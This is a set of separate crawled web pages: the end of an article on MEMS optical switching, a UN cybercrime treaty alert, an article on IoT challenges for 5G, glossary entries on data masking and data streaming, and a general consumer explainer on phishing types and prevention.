By internally packaging the optics, whether collimating lenses or waveguides, they become considerably less susceptible to shifting or misalignment due to environmental effects that can wreak havoc on exposed optical components. But if the manufacturing process is not closely controlled, the benefits of internally packaging optics and electronics with the MEMS switch can be offset by new vulnerabilities introduced by the need for multiple fiber feedthroughs through the hermetic package. Each fiber or pin entering or exiting the package represents a possible point of compromise to the package's hermeticity. Careful attention must be paid to this issue in the manufacturing process.
The key to controlling manufacturing processes and ensuring hermeticity in the high volumes required for current and future applications is the development of automation in manufacturing. The manufacture of the actual MEMS-based switch core exploits established, highly automated silicon foundry processes in use for more than a decade. The remaining challenge lies in fiber integration and module packaging.
Automation is crucial before, during, and after optoelectronic packaging of MEMS devices to reduce cost and cycle time as well as improve product quality and consistency. For example, consider the full optical-performance testing of a 32x32 optical crossconnect with over 1,000 possible paths. Using traditional manual testing methods, this type of testing can take more than a week. OMM has developed in-house test equipment that performs a full optical-performance test in just a few hours.
While these hurdles remain in the path of full-scale deployment of MEMS-based all-optical crossconnects, advances in optical and silicon technology bring us closer to the goal every day. In January, field trials at an unmanned central office marked the first time that optical switches based on MEMS subsystems were deployed to carry live data traffic. OMM delivered a custom-configured rack-mount optical-crossconnect subsystem containing 4x4 and 8x8 all-optical-crossconnect switches for field trials by the National Transparent Optical Network Consortium (NTONC) at a network node in Oakland. NTONC includes Nortel Networks, GST Telecommunications, Sprint Communications, Lawrence Livermore National Laboratory, and San Francisco Bay Area Rapid Transit (BART).
The optical switches worked flawlessly for the complete duration of the trials. Although a relatively new technology, MEMS-based switching must be held to the same high standards as any critical network component. The field trials established MEMS's high reliability and excellent optical performance. The new age in optical switching has arrived.
Marc Fernandez is the director of business development for advanced products, and E. Kruglic is the principal MEMs designer at Optical Micro Machines Inc. (San Diego). | <urn:uuid:ae8ee3a2-56da-4948-b5ac-3b098ee37187> | CC-MAIN-2024-38 | https://www.lightwaveonline.com/optical-tech/transport/article/16648772/mems-technology-ushers-in-a-new-age-in-optical-switching | 2024-09-09T07:58:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00877.warc.gz | en | 0.921581 | 2,650 | 3.234375 | 3 |
The United Nations Ad Hoc Committee has approved a landmark, yet controversial, treaty on cybercrime. The agreement marks the first global effort to establish a comprehensive legal framework against cyber-related offences.
Initiated by Russia in 2017, the treaty faced significant opposition from digital rights groups, tech companies, and various UN member states. However, it was adopted after three years of negotiation and will enter into force once ratified by at least 40 member states.
The treaty introduces broad powers for law enforcement agencies, including the ability to compel service providers to disclose electronic data and facilitate international cooperation in cybercrime investigations. While it aims to tackle serious crimes, such as child sexual abuse, money laundering, and online exploitation, the treaty has raised significant concerns among human rights organisations.
Critics argue that authoritarian regimes could exploit it to suppress freedom of expression and crack down on dissidents, journalists, and activists. The treaty’s provisions allowing cross-border data requests without robust safeguards may lead to abuses and heightened state surveillance. Industry should consider practical steps to ensure they are informed about the treaty’s potential impact on their operations.
Key elements of the treaty
- Global Legal Framework: Establishes the first comprehensive international legal framework for combating cybercrime, focusing on enhancing global cooperation among member states.
- Criminalisation of Cyber Offences: Mandates member states to criminalise activities such as illegal access to information systems, data interference, system interference, misuse of devices, and cyber-enabled forgery and fraud.
- Protection of Children Online: Includes specific provisions against online child sexual abuse and exploitation, including the production, distribution, and possession of such material, as well as solicitation and grooming for sexual offences.
- International Cooperation: Facilitates cross-border collaboration, including sharing of electronic evidence, mutual legal assistance, and expedited preservation of data for investigations.
- Human Rights Safeguards: Contains provisions to ensure that the implementation of the treaty does not infringe on fundamental human rights, including freedoms of expression, privacy, and data protection.
- Jurisdictional Rules: Establishes guidelines for member states to assert jurisdiction over cybercrimes, including crimes committed within their territory or affecting their nationals.
- Real-Time Data Collection: Empowers states to implement measures for the real-time collection and interception of traffic data and content data during investigations.
- Legal and Procedural Measures: Requires member states to adopt legal frameworks that allow for the seizure, freezing, and confiscation of assets related to cybercrime.
- Liability of Legal Entities: Stipulates that both individuals and legal entities can be held liable for committing or participating in cybercrimes.
- Capacity Building and Technical Assistance: Emphasises the need to provide technical assistance and capacity-building to help developing countries combat cybercrime effectively.
Practical steps for industry
- Review and Assess Compliance: Companies, particularly in the tech sector, should closely examine the treaty’s requirements to ensure compliance, especially regarding data preservation and cooperation with law enforcement across borders.
- Monitor Legislative Developments: As the treaty progresses to ratification, it is essential to monitor how individual countries incorporate its provisions into national law, as this will impact enforcement practices and potential liabilities.
- Engage in Advocacy: Companies should consider joining industry coalitions or engaging with policymakers to advocate for stronger safeguards that protect human rights and privacy, ensuring that any domestic implementation of the treaty does not lead to overreach or misuse.
Access Partnership works closely with businesses and governments to drive innovation and ensure fit-for-purpose regulation. To learn how your business can capitalise on the implications of the UN’s new cybercrime treaty, please contact Mark Smitham at [email protected], Ethan Mudavanhu at [email protected], or Christopher Martin at [email protected]. | <urn:uuid:1184a340-b27b-452a-8aaf-f314ea5a9685> | CC-MAIN-2024-38 | https://accesspartnership.com/access-alert-un-approves-controversial-cybercrime-treaty/ | 2024-09-13T03:05:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00577.warc.gz | en | 0.923791 | 776 | 2.84375 | 3 |
The Internet of Things (IoT) has become ubiquitous, and the number of connected devices is expected to grow to 29.3 billion by 2023. Millions of new devices go online each year at the start of the school year and after the holidays, and you can even watch the popularity of IoT devices fluctuate with the seasons. These devices are becoming more integral to daily life as they bring power to our homes, streamline our work processes and make communications more convenient.
When adopted at scale, these devices require faster networks with higher capacities to fulfil their connectivity needs. And while IoT has already found use in many business sectors — providing information, automation and other services that wouldn’t have been possible before — many organizations overlook the challenges IoT devices pose to 5G networks when it comes to securing network architecture. As someone whose company works with advanced AI algorithms that monitor and protect IoT devices, the following are some of those challenges I have seen posed by IoT devices to 5G networks.
Increase in Bandwidth Needs
In very simple terms, the internet is a combination of networks, which are administered by various public and private organizations and facilitated by a collection of internet exchange points (IXPs). This distributed structure makes the internet resilient and robust, but the exponential increase in bandwidth requirements and capacity in 5G networks (due to higher IoT device numbers) might become a significant issue for IXPs in the coming years.
With the growing demand and use of cloud computing, the need for bandwidth and internet speed will also increase. This is extremely relevant when we talk about IoT devices, as some manufacturers try to solve IoT security issues by only connecting devices through the cloud. Failure to address these needs as 5G rolls out might create issues for a significant number of internet users and businesses.
Digital Infrastructure and Interdependence
Due to the far-reaching and transformative nature of IoT-based projects and their intrinsic complexity, poorly implemented industrial IoT solutions might create infrastructural risks for network service providers. The digital infrastructure creates many interdependent processes that depend on connectivity.
As more industrial IoT devices go online and factories further automate their operations, entire production lines might be negatively affected if a single type of sensor becomes vulnerable to cyberattacks. A sophisticated denial-of-service (DoS) attack on such devices might cause a cascade effect and create service gaps. It is vital that leaders provide IoT teams with appropriate support and address their service concerns.
These potential issues are a challenge to both network operators and infrastructure and operations (I&O) leaders, who must carefully assess the needs and potential issues of the IoT projects under their control. Their responsibilities go beyond evaluating cloud dependencies and infrastructural needs for daily operations, and they must include worst-case security scenarios such as mirrored DDoS attacks on devices.
The transition of most industrial sectors to 5G networks is the driving factor behind the near-term growth of massive data exchange. With the growing popularity of and demand for IoT technologies, data management is becoming more complex for 5G networks.
Most of the new IoT devices will be small, relatively powerful and low cost, making them prolific. Add to this the fact that industrial IoT devices are expected to work for many years, even when placed in harsh environments, and the growing bandwidth and security demands posed by these devices will only accumulate over time. Industrial IoT might also reveal key infrastructural weak points that do not have the capacity to handle this increasing demand.
As for consumers, they are less likely to take full advantage of 5G networks in terms of IoT connectivity than municipalities or large industrial operators; however, any emerging IoT risks to network stability would be felt in the consumer segment whenever network infrastructure is impacted.
As 5G technology extends device mobility through IoT, data becomes more vulnerable than ever before. New antennas will allow a much larger number of devices to connect to the same network node, making them more susceptible to attacks. Good IoT security practice therefore requires unique authentication methods and strict access management on gateways to mitigate some of these threats. Protective measures are vital to safeguard network integrity and to address the evolving 5G security challenges.
How to Strategically Address Emerging IoT Capabilities
There are several things that can improve our readiness to deal with IoT issues. First and foremost, key internet infrastructure has to be assessed and made ready to handle the bandwidth spikes created by massive IoT botnets. This might require building in more redundancies or simply expanding capacity at key points in the infrastructure.
On the consumer side, more easy-to-use gateway management solutions and protections, such as firewalls, would greatly improve IoT security. Many consumers and businesses do not have a clear and easily accessible way to audit their local networks for unknown or rogue devices. Few can detect new and suspicious connections. These types of network management solutions are usually present on well-managed enterprise networks, and there is no real reason not to provide them to SMBs or the average consumer in 2021.
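Such an audit can be as simple as comparing the devices currently visible on the network against a known-device list. In the sketch below, the observed MAC addresses are assumed to come from elsewhere (e.g., the router's ARP or DHCP client table), and all addresses are made up:

```python
KNOWN_DEVICES = {
    "a4:83:e7:12:34:56": "living-room thermostat",
    "f0:18:98:ab:cd:ef": "office laptop",
}

def audit(observed_macs):
    """Flag any device on the network that is not in the known-device list."""
    return [mac for mac in observed_macs if mac not in KNOWN_DEVICES]

# Hypothetical snapshot of the gateway's client table.
seen = ["a4:83:e7:12:34:56", "de:ad:be:ef:00:01"]
for rogue in audit(seen):
    print(f"Unknown device on network: {rogue}")
```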
The bottom line is that the impact of IoT devices on 5G networks will become more prominent in the coming years. These and other challenges show how IoT could hamper the performance of 5G networks, and why both network service operators and their largest clients need to address emerging IoT capabilities strategically.
Einaras von Gravrock, CEO of CUJO AI, the only AI cybersecurity solution currently deployed on 1B connected devices. Acclaimed by World Economic Forum, Gartner. | <urn:uuid:1ff3574d-c4d7-4e13-a5fc-2a7d19d8fb08> | CC-MAIN-2024-38 | https://www.asiaautomate.com/post/challenges-to-5g-networks-from-iot-devices | 2024-09-13T01:42:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00577.warc.gz | en | 0.948263 | 1,112 | 2.640625 | 3 |
What is Data Masking?
Data masking is a method used to protect sensitive information by making it unreadable to unauthorized users. However, this altered data still retains its usability for authorized purposes. Think about a book where all the names and addresses are replaced with fictional ones, but the story remains the same. That’s similar to what data masking does—changing the details without losing the overall structure.
Why is Data Masking Important?
- Protection of Sensitive Information: One of the most critical reasons for data masking is that it prevents personally identifiable information (PII) from falling into the wrong hands. Suppose a company’s database has been hacked. In that case, the masked data is useless to the attacker, since it contains no genuine personal details. This reduces the risk of identity theft and financial fraud.
- Compliance with Data Protection Regulations: To safeguard personal data, organizations must follow rules such as Europe’s General Data Protection Regulation (GDPR) or America’s Health Insurance Portability and Accountability Act (HIPAA), and failure to do so can attract hefty fines. Masking supports compliance by ensuring that no one without authority can access sensitive information.
- Maintaining Data Integrity for Testing and Development: Using actual customer data for software development and testing can be very risky. Still, developers need something that looks and behaves like the real thing to test systems properly. Masking keeps tests realistic and credible while ensuring that no genuine customer information is exposed.
Types of Data Masking
- Static Data Masking: In this, a database copy is created, where everything except sensitive data is permanently replaced with masked values. The masked copy can then be used for testing, analytics, or any other purpose while the original remains safe.
- Dynamic Data Masking: Here, information is concealed on the fly as it is accessed; authorized users view actual data, while those without authorization see only a masked version (see the sketch after this list). This suits scenarios where records must stay secure yet remain accessible to some users.
- On-the-Fly Data Masking: This approach masks data as it is transferred between systems or environments, often when data needs to be shared with external parties or moved into less secure surroundings.
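To make the static/dynamic distinction concrete, here is a toy dynamic-masking gate in Python: the stored record never changes, and what each caller sees depends only on their authorization. The field names and mask format are illustrative:

```python
RECORD = {"name": "Alice Smith", "ssn": "123-45-6789", "city": "Boston"}
SENSITIVE_FIELDS = {"name", "ssn"}

def view(record, authorized):
    """Return real data for authorized users, masked values for everyone else."""
    if authorized:
        return dict(record)
    return {key: ("***" if key in SENSITIVE_FIELDS else value)
            for key, value in record.items()}

print(view(RECORD, authorized=False))
# {'name': '***', 'ssn': '***', 'city': 'Boston'}
```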
How Data Masking Works
Data masking modifies information so that it becomes meaningless to unauthorized persons. The process usually involves three steps: identifying the target data, applying a masking method, and substituting the original values with modified ones. To illustrate, someone’s true name might be changed to “John Doe” within the database for privacy reasons.
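A minimal end-to-end sketch of that identify-mask-substitute flow might look as follows; the column names and the pseudonym lists are assumptions made for the example:

```python
import random

FIRST_NAMES = ["John", "Maria", "Wei", "Fatima"]
LAST_NAMES = ["Doe", "Nguyen", "Garcia", "Khan"]

def mask_table(rows, sensitive_columns):
    """Replace values in the identified sensitive columns with pseudonyms."""
    masked = []
    for row in rows:
        out = dict(row)  # leave the original record untouched
        for column in sensitive_columns:
            if column in out:
                out[column] = f"{random.choice(FIRST_NAMES)} {random.choice(LAST_NAMES)}"
        masked.append(out)
    return masked

customers = [{"name": "Alice Smith", "plan": "premium"}]
print(mask_table(customers, sensitive_columns=["name"]))
# e.g., [{'name': 'John Doe', 'plan': 'premium'}]
```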
Common Data Masking Techniques
- Substitution: This technique involves replacing accurate data with realistic but fictional data. For example, a real customer name might be replaced with a randomly generated name that follows the same format. This allows the data to remain usable while protecting sensitive information.
- Shuffling: This technique shuffles entries within a dataset without changing their format; for instance, phone numbers in a list could be rearranged so that they no longer correspond to the people they belong to. It obscures the facts while retaining the structure of the records (shuffling and redaction are illustrated in the sketch after this list).
- Encryption: Encryption is not the same as data masking, but it is often used alongside it as a strategy to protect data in transit or in storage.
- Redaction: Redaction involves removing or obscuring specific data parts, like how sensitive document information might be blacked out. This technique is often used when details must be hidden entirely while showing other parts of the data.
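A brief sketch of the shuffling and redaction techniques (substitution was sketched in the previous section); the records and the redaction pattern are fabricated for illustration:

```python
import random
import re

def shuffle_column(rows, column):
    """Shuffle one column across rows so values no longer match their owners."""
    values = [row[column] for row in rows]
    random.shuffle(values)
    return [dict(row, **{column: value}) for row, value in zip(rows, values)]

def redact(text):
    """Black out anything shaped like a US Social Security number."""
    return re.sub(r"\b\d{3}-\d{2}-\d{4}\b", "[REDACTED]", text)

people = [{"name": "A", "phone": "555-0101"}, {"name": "B", "phone": "555-0102"}]
print(shuffle_column(people, "phone"))
print(redact("SSN on file: 123-45-6789."))  # -> SSN on file: [REDACTED].
```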
When to Use Data Masking?
1. Software Development and Testing
Software development and testing require realistic data. Developers need it to exercise their applications, but using customers’ actual data can be dangerous. Masked data provides a safe alternative that still behaves like the real thing.
2. Outsourcing and Third-Party Data Sharing
Whenever companies outsource tasks or share their information with third-party vendors, they risk exposing sensitive materials. Masking helps control this risk by ensuring that the shared data is not sensitive yet remains valuable for the vendor’s intended use.
3. Analytics and Reporting
Organizations frequently analyze records to gain insights and make decisions. Doing so on raw records presents security challenges, because it can leak personal details not meant for wide circulation. With masking, businesses can perform analytics on realistic, representative information without revealing private facts.
4. Employee Training
It is necessary to train staff members, especially those in technical support and customer service roles, to use realistic scenarios based on actual client figures. It enables trainers to do so without compromising confidentiality; thus, no accurate client information shall be disclosed during training sessions.
Benefits of Data Masking
1. Enhanced Data Security
The most noticeable advantage of this technique is that it increases data security by denying access rights to unauthorized individuals who might have illegally gained entry into an organization’s database system. Even if they succeed, they won’t see anything meaningful since everything will appear scrambled, hence useless to them.
2. Reduced Risk of Data Breaches
Data breaches can lead to severe financial loss and damage to a company’s reputation. Masking information minimizes the chances of such incidents occurring since whatever gets exposed would be of no use whatsoever to an attacker.
3. Improved Compliance
As stated before, compliance becomes more accessible when one uses it as part of their overall strategy toward GDPR, HIPAA, and other related rules. Therefore, penalties are avoided, and customers’ trust in their provider’s ability to handle personal records responsibly is built upon.
Challenges in Data Masking
1. Maintaining Data Usability
The issue here lies in how much change should be made within masked data so that it remains usable without compromising its purpose, such as testing or analysis. For instance, if too much manipulation is done, the required results may not be achieved.
2. Performance Considerations
Dynamic data masking can impact system performance. Masking data in real time requires higher processing power, which can slow down applications or databases.
3. Keeping Up with Evolving Regulations
Organizations operating globally need help keeping pace with changing laws governing information protection. What may have been complaint yesterday might become illegal tomorrow, complicating matters further, especially when dealing with multiple regulatory frameworks simultaneously.
Best Practices for Implementing Data Masking
- Identifying Sensitive Data: The first step in data masking is identifying which data needs to be masked. This typically includes personal information, financial details, and any other data that could be considered sensitive.
- Choosing the Right Masking Technique: Different masking techniques are suited to various scenarios. Substitution might protect names and addresses, while redaction is ideal for hiding specific details in documents.
- Automating the Process: By automating various parts involved in applying this approach across systems, we ensure consistency alongside accuracy, without which human error tends to appear frequently, leading to ineffective results attainment.
- Regular Auditing and Updating: It is not a one-time task. Regular audits should be conducted to ensure that masked data remains secure, and that new data is appropriately protected. The masking strategy should be updated accordingly as regulations and business needs evolve.
Data Masking vs. Encryption
Encryption and data masking perform the same function of protecting data, but they do so differently. It makes the information unreadable for unauthorized parties while keeping it practical for specific uses like testing or analytics. On the other hand, encryption changes data into a code that can only be understood with a key, therefore securing it against unauthorized access.
When to Use Each Method
Generally, people use data masking when there is still need to access raw details without showing them; this might occur during software testing or analytics processes among others. Storage or transit protection that needs to remain entirely secure on any account forms the best utilization of encryption technique.
For added safety measures, you may use these two together: encrypt first, then mask afterward. This will give you another level of security in your systems, with sensitive records such as personal identification number (PIN) codes handled by financial institutions, for instance.
Real-World Examples of Data Masking
1. Healthcare Industry
It is often used in the healthcare industry to protect patient information. For example, a hospital might use data masking to create a database for research purposes, replacing all patient names and social security numbers with fictitious ones.
2. Financial Services
Banks and financial institutions frequently use it to protect customer information. For instance, a bank might mask credit card numbers in their database to ensure that the masked credit card numbers would be useless to the attacker even if the data is breached. This practice helps protect both the bank and its customers from potential fraud.
E-commerce companies handle sensitive customer data, such as addresses and payment information. Moreover, it can protect this information when it’s used for purposes like analytics or reporting. For example, a company might mask customer names and payment details before analyzing purchase trends, ensuring that no sensitive data is exposed during the analysis.
Data Masking ensures that private information remains confidential while allowing different uses of such data, such as testing and analytics, among others. Businesses should know how, where, and when each type or technique should be applied based on what exactly they want masked since this will help them meet required standards and protect their systems from unauthorized access, which might lead to non-compliance with regulations.
Share this glossary | <urn:uuid:ac590483-a717-46bb-9e83-8d18bcbdffbc> | CC-MAIN-2024-38 | https://kanerika.com/glossary/data-masking/ | 2024-09-15T14:43:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00377.warc.gz | en | 0.920488 | 1,983 | 3.65625 | 4 |
What is Data Streaming?
Data streaming is the process of generating data from multiple sources and consortia of incoming data almost instantaneously. It is different from batch processing, where the data is gathered, loaded, and batch-processed somewhere later. In the case of data streaming, one can analyze and act on the data almost immediately after it has been produced. This approach becomes helpful in scenarios where real-time information is required, such as trading applications, social media analytics, and surveillance.
However, the need for data streaming is emphatic due to the need for real-time data, which is needed to make fast-paced decisions in modern-day environments. Sectors like finance, healthcare, e-commerce, and media use data streaming to increase user satisfaction, prevent financial fraud, improve processes, and innovate.
How Data Streaming Works?
Data streaming is the ongoing transmission of data from certain data sources to certain data processing systems, which commence analysis upon receiving the data. It all starts with data producers, such as social networks, transaction systems, or sensors, generating steamtable data at a very high rate. That data then goes into a data stream, which carries records indefinitely toward a system for processing.
What are the Key Components of a Data Streaming System?
- Message Brokers: Tools such as Apache Kafka act as intermediaries, conveying data between producers and consumers.
- Stream Processors: Systems like Apache Flink or Spark Streaming are used for real-time data analytics. These systems receive data streams, filter, aggregate, and transform them while the data transitions.
With its real-time processing capabilities, data streaming offers a more flexible and faster approach than traditional methods. Unlike the latter, which involves collecting and processing data at intervals, data streaming allows for immediate processing. This is particularly significant in fraud detection, where the ability to process data in real-time can profoundly impact.
Key Technologies and Tools for Data Streaming
1. Apache Kafka
Apache Kafka is a central technology for designing and implementing real-time data streaming applications. Initially developed by LinkedIn, it is an open-source distributed event streaming platform that provides many features, such as high bandwidth and low latency in data transport. It serves as a message broker by working between data providers (the sources producing the data) and their consumers (the applications or services processing that data). Scalability and fault tolerance are other areas where Kafka excels.
2. Apache Flink
Apache Flink is an effective stream processing framework supporting batch and real-time data processing. It excels in complex event processing (CEP) and provides in-memory processing capabilities, allowing for real-time analytics with low latency.
Unlike other stream processors, Flink’s stateful stream processing is well suited for applications that require context or knowledge to be retained for them to operate, such as fraud detection and real-time recommendations.
3. Apache Spark Streaming
Apache Spark Streaming represents an implementation of Apache Spark that supports the real-time processing of data streams in a distributed, fault-tolerant, and higher throughput manner. Each data stream in Spark Streaming is divided into small micro-batches, which solves the drawbacks of traditional batch and streaming modes. One such limitation can be overcome by allowing it to work with the rest of the ecosystem, including Spark SQL and MLlib, for advanced data analysis and machine learning.
4. Amazon Kinesis and Azure Stream Analytics
These are cloud-based data streaming services that AWS and Microsoft Azure provide. With a real-time data streaming framework, application developers can use Amazon Kinesis to provide real-time stream processing, where they can collect and analyze data instantly. Azure Stream Analytics offers similar functions but emphasizes combining such capabilities with other Azure services. Hence, it facilitates the development of cloud-based end-to-end streaming solutions.
Applications of Data Streaming
1. Real-Time Analytics
Real-time data stream processing enables businesses to volumize data and analyze patterns immediately. This is very important in industries such as finance, where real-time data analysis helps identify cases of fraud or market changes, which then helps businesses adjust to the environments.
2. IoT Data Processing
The Internet of Things (IoT) is defined by the sheer volume of data generated by intelligent connected devices. Streaming allows users to work with this data rather than store it, facilitating timely activities and events such as health care monitoring, equipment maintenance, and factory and home automation.
3. Financial Services
In the financial market, streaming data is essential for real-time stock price monitoring, algorithmic trading, and dynamic portfolio management. For example, hedge funds use continuous data streams to make split-second trading decisions, optimizing profit potential by reacting instantly to market fluctuations. This real-time processing enhances decision-making and reduces the risk of losses.
4. Media Streaming
Entertainment networks such as Netflix, Spotify, and YouTube for audio content employ data streaming staff to deliver video or audio to audiences almost as fast as the media is recorded. This allows consumers to enjoy the service without any loss in value despite fluctuations in demand or supply.
5. Event-Driven Architectures
Data streaming is crucial for these systems, as any event triggered by an application must prompt a response from the system. This is particularly beneficial for real-time inventory management, order fulfillment, and customer customization in e-commerce.
Benefits of Data Streaming
1. Real-Time Process
Streaming data makes it possible to analyze and digest information in real-time. Hence, business processes can be handled without delay. This is essential, especially in situations that require prompt attention, such as checking for fraud or tracking activities live.
Platforms like Apache Kafka and Amazon Kinesis are prime examples of the scalability capabilities of data streaming. They can process large data volumes and scale out, allowing for growth without compromising performance.
3. Better Decision Making
Data in motion allows organizations to process information faster and invest more rationally. With real-time insights, organizations can act before changes occur or respond when situations change.
4. Even better User Experience
In media streaming services, data streaming facilitates uninterrupted content watching by eliminating lags and room for buffering. User experience has improved, and the engagement level has increased, which is necessary to keep up with the competition.
5. Cost Efficiency
Data streaming’s cost efficiency is a significant advantage. It eliminates the need for storage, especially for large requirements and batch systems, potentially saving on infrastructure costs and optimizing resource utilization.
Challenges in Data Streaming
- Data Quality and Consistency
The integration of data streaming will advance alongside AI and machine learning. Data quality in actor systems is dynamically maintained, as ways need to be constructed to take care of incomplete data streaming information.
- Latency and Performance
Real-time latency, a critical requirement in real-time applications, presents significant challenges. Achieving this level of latency is often hindered by factors such as network congestion, suboptimal hardware, or inefficient processing algorithms.
With the increase in streaming data, systems should also be able to expand to manage the added burden without affecting their performance. This calls for proper structural design and resource management.
- Complexity in Implementation
Data streaming infrastructure for data management involves setting up and maintaining several message exchanges, storage, and stream processing components.
- Security and Privacy Concerns
When sensitive data is being streamed, it is crucial to implement robust security measures. This is especially true during data acquisition, where careful security considerations are paramount to ensure data privacy is maintained.
Future Trends in Data Streaming
1. Incorporation of AI and Machine Learning
2. Edge Computing
The development of edge computing will move data processing to the closest possible location, resulting in reduced bandwidth usage and latency. This trend is especially crucial in IoT applications since data must be processed almost immediately.
3. Enhanced Data Security
With data streaming receiving wide acceptance in organizations, there will be a growing concern over the secure transfer of such data. To shield confidential records, more sophisticated encryption methods and better identity verification systems will be adopted.
4. Hybrid Cloud Solutions
Hybrid cloud computing, which integrates cloud and on-premises streaming architecture, will be embraced to provide organizations with flexibility and enable them to address the ever-increasing data requirements.
5. Improved Data Observability
Further, new applications or systems will emerge that are meant to more efficiently form data observability in streaming pipelines.
Organizations tend to embrace this technology to solve the problem of data and its management problem, which helps them analyze and come up with accurate conclusions. As new technologies come forth, AI and data security will shape the future of streaming data. Therefore, it will be an effective weapon in any business. Therefore, since wanting to receive information instantaneously is likely to increase, paying attention to these trends and assessing their effectiveness and ineffectiveness will be crucial in remaining competitive in the changing world.
Share this glossary | <urn:uuid:5ba6bff5-8de1-4210-92cc-97180fd019f8> | CC-MAIN-2024-38 | https://kanerika.com/glossary/data-streaming/ | 2024-09-15T12:19:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00377.warc.gz | en | 0.919317 | 1,840 | 3.375 | 3 |
Even if you aren’t very much into cybersecurity and are not particularly tech-savvy, you’ve probably heard about the term phishing. But, do you know how it works and what the most common forms of phishing are?
It’s estimated that around 15 billion spam emails are sent out daily. More worryingly, on average, one in every 99 emails is a phishing attack, meaning that the overall attack rate is just over 1%.
And, to add to this, around 90% of all breaches occur due to phishing. All of these numbers speak to just how important it is to know how phishing works and what the best protection practices against it are.
In this detailed page, we’ll go over various forms of phishing, the differences between them and share with you examples of phishing emails to help you understand everything you need to know about this cybersecurity threat.
What Does Phished Mean?
The first step in protecting against phishing is understanding what it is and how it works. So, what is the meaning of phished, and how do you get phished? In simple terms, phishing is a form of social engineering attack attackers employ to steal your personal data.
In its essence, phishing is a very simplistic form of attack. It revolves around tricking the target victim by impersonating a trustworthy source. Trusting the sender, the victim unknowingly infects their device with malware, freezes their system, or shares sensitive information they wouldn’t reveal to strangers.
Depending on the severity of the phishing attack, there could be very serious consequences for the victim. The target might experience identity theft or lose all of their money. When it comes to who the targets are, anyone can fall prey to such an attack. Moreover, phishing doesn’t only affect individuals. It’s also a common occurrence in the business world.
What is Email Phishing?
Most phishing attacks are carried out through emails, so it’s key to highlight this method in order to help you recognize it. The process is fairly simple. Email phishing techniques involve attackers registering fake domains and creating fake credentials that resemble those coming from legitimate sources.
For example, you might get an email impersonating your bank’s support agent or a representative urging you to change your password, click on a link to fill out some information, or simply download some attachments featuring the latest updates.
Many unsuspecting people assume that, just because the email seems to come from a recognizable address, it’s safe to interact with. However, to avoid getting phished through an email link or attachment, always make sure to double-check the sender’s email address and make sure the email is genuine.
Example of Phishing Attack
While this phishing example is the most common one that affects online users, there are many other types of phishing that you should be aware of. To help you recognize other prevalent types of phishing, let’s quickly highlight them:
- Smishing- this form of phishing replaces email communication with SMS. It involves the cyber attackers sending the victim a similarly-crafted message with a link or attachment, urging them to click on the content of the SMS.
- Vishing - like the previous form of phishing, this includes targeting the victim’s phone, but this time through a voice message. The attackers leave voice messages trying to induce the victim to reveal valuable personal or financial information.
- Angler Phishing - Angle phishing has become increasingly prevalent in today’s era of social media. Attackers disguise themselves as company representatives or customer service agents to obtain personal info, account credentials, or other data of other social media users
What's Spear Phishing?
Spear phishing is a more sophisticated type of phishing. Unlike regular phishing, which usually casts a broader net in hopes of capturing a victim, spear phishing is much more targeted. So, in the context of spear phishing vs phishing, the latter focuses more on quantity. While phishing attacks often interact with thousands of recipients, spear phishing attacks don’t come anywhere near this number.
Instead, spear phishing attacks target you as an individual. Prior to sending you a spear phishing email, attackers engage in social engineering, trying to dig up as much information on you as possible to make it seem like they know you.
With this in mind, spear phishing attacks are most often targeting a very specific goal. Most often, they present themselves as someone from your business or personal life, asking you to send them money and forwarding you seemingly genuine wiring instructions.
Whaling vs Spear Phishing vs Phishing
Besides spear phishing, there’s an even more targeted type of attack, called whaling. This form of phishing only targets CEOs and employees at high levels in the corporate world. Whaling attacks often require the attackers to do extensive research and preparation in order to tailor the phishing email to have the best chance of success.
In short, whaling attacks work identically to regular phishing ones, just with a more specific pretext. For instance, cyber attackers impersonate an employee's boss or colleague and usually ask for a favor or provide them with some sort of opportunity that will entice them to interact with the malicious email.
Example of Phishing Attack
Examples of Phishing Attacks
With phishing being the most common security threat in the online world, there are countless examples of phishing attacks out there. So much so, that even some of the biggest companies in the world aren’t impervious to such threats. With that in mind, we want to share two well-known phishing attacks that have occurred in the past few years.
Just this year, there has been an attack on Microsoft 365 accounts based on AITM (Adversary-in-the-Middle) tactics. The attack was so well-targeted that it even worked on users’ email accounts that had MFA enabled.
Example of Phishing Attack
But, this was far from the only successful big phishing attack in 2022. The renowned US company Cloudflare also experienced a phishing attack when its employees were tricked into entering their work credentials on a phishing site. In less than one minute, at least 76 Cloudflare employees received a phishing text, with many of them falling victim to the ruse.
Example of Phishing Attack
How to Stop a Phishing Attack?
Stopping a phishing attack is challenging, as most people notice what’s happening only when it’s too late. But, there are some prevention methods that you can use to ensure you don’t fall victim to a phishing attack. Here are four best tips on how to prevent a phishing attack:
- Always Verify Before Clicking - this simple tip is very effective for helping you avoid phishing scams. Always think before you click on a link or attachment, and avoid clicking on something you’re not 100% sure about.
- Keep Your Information Private - don’t reveal your private information unless you must. Even when you want to log in or purchase something online, don’t do it through email or SMS links. Go directly to the source site.
- Keep Everything Up to Date - mainstream browsers and antivirus programs regularly put out patches to address new security risks, so make sure not to delay updates when prompted.
- Use a Security Key - security keys that meet FIDO U2F/FIDO2 standards are perhaps the best way to protect yourself from phishing. They automatically recognize the genuine domain and eliminate the need for manually typing passwords.
Protecting Yourself Against Phishing Without Delay
In 2017, Google rolled out a new requirement that completely neutralized phishing attacks on its employees. With well around 140,000 employees, Google hasn’t had any phishing attacks since 2017. This might seem like a logistical miracle, but in reality, it was realized with one simple tweak.
In 2017, all Google employees had to stop using passwords to log in. Even using one-time codes was prohibited. Instead, every Google employee had to start using physical security keys to access their accounts.
A Google spokesperson said Security Keys now form the basis of all account access at Google.“ We have had no reported or confirmed account takeovers since implementing security keys at Google,” the spokesperson said. “Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”
Of course, these benefits and security features aren’t only reserved for big tech companies and organizations with massive budgets. Everyone can obtain anti-phishing software free of charge or at a minimal cost and protect themselves from the dangers of phishing attacks.
